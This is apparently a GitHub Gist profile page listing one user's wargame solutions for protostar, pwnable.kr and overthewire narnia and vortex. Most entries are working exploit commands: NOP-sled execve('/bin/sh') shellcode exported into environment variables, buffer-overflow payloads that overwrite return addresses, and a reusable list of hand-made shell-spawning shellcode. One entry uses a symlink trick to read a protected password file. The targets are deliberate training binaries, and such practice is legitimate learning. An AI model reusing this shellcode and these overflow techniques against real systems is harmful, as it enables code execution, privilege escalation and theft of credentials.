Skip to content

Instantly share code, notes, and snippets.

View plvhx's full-sized avatar
🏠
Working from home

Paulus Gandung Prakosa plvhx

🏠
Working from home
161 followers · 238 following
View GitHub Profile
@plvhx
plvhx / README.md
Last active December 22, 2016 12:54
protostar stack0
@plvhx
plvhx / README.md
Last active December 22, 2016 12:54
protostar stack0 exploit

Place shellcode in environment variable

$ export PAYLOAD=$(python -c 'import sys;sys.stdout.write("\x90"*(100) + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")')

Find addr of 'PAYLOAD' environment variable

#include <stdio.h>
@plvhx
plvhx / README.md
Created September 16, 2016 23:40
pwnable.kr fd 
fd@ubuntu:~$ ./fd 4660
LETMEWIN
good job :)
mommy! I think I know what a file descriptor is!!
@plvhx
plvhx / README.md
Created September 16, 2016 23:46
pwnable.kr bof 
#! /usr/bin/python

# tesla_ ([email protected])

import sys
import struct
import socket
import telnetlib
@plvhx
plvhx / README.md
Last active December 22, 2016 12:53
overthewire vortex level0 
#! /usr/bin/python -W ignore::DeprecationWarning

# tesla_ ([email protected])

import sys
import struct
import socket
import telnetlib
@plvhx
plvhx / README.md
Last active December 22, 2016 12:53
overthewire.org narnia level0 
(python -c 'from struct import *;print "\x41"*(20) + pack("<I", 0xdeadbeef)' 2> /dev/null; tee) | ./narnia0
@plvhx
plvhx / README.md
Last active December 22, 2016 12:53
overthewire.org narnia level1 
narnia1@melinda:/narnia$ export EGG=$(python -c 'print "\x90"*(200) + "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x50\x53\x89\xe1\x8b\x54\x24\x08\xb0\x0b\xcd\x80"')
narnia1@melinda:/narnia$ ./narnia1
Trying to execute EGG!
$
@plvhx
plvhx / README.md
Created September 18, 2016 21:02
overthewire.org narnia level2 
narnia2@melinda:/tmp/.s0$ cat pl_env
export EGG=$(python -c 'print "\x90"*(200) + "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x50\x53\x89\xe1\x8b\x54\x24\x08\xb0\x0b\xcd\x80"')
narnia2@melinda:/tmp/.s0$ export EGG=$(python -c 'print "\x90"*(200) + "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x50\x53\x89\xe1\x8b\x54\x24\x08\xb0\x0b\xcd\x80"')
narnia2@melinda:/tmp/.s0$ ./env
0xffffd7f5
narnia2@melinda:/tmp/.s0$ nano pl.py
narnia2@melinda:/tmp/.s0$ cat pl.py
#! /usr/bin/python
@plvhx
plvhx / README.md
Created September 18, 2016 21:13
list of hand-made shellcode i've ever used in CTF... 
[execve("/bin/sh", ["/bin/sh", NULL, NULL], NULL)]

"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50" + \
"\x50\x53\x89\xe1\x8b\x54\x24\x08\xb0\x0b\xcd\x80"

[execve("/bin/sh", ["/bin/sh", NULL, NULL], NULL)]

"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50" + \
"\x50\x53\x89\xe1\x8d\x54\x24\x08\xb0\x0b\xcd\x80"
@plvhx
plvhx / README.md
Created September 18, 2016 23:44
overthewire.org narnia level3 
narnia3@melinda:/narnia$ ln -sf /etc/narnia_pass/narnia4 /tmp/$(python -c 'print "\x41"*(27)')/tmp/wkwkwk
narnia3@melinda:/narnia$ ./narnia3 /tmp/$(python -c 'print "\x41"*(27)')/tmp/wkwkwk
copied contents of /tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp/wkwkwk to a safer place... (/tmp/wkwkwk)
narnia3@melinda:/narnia$ cat /tmp/wkwkwk
********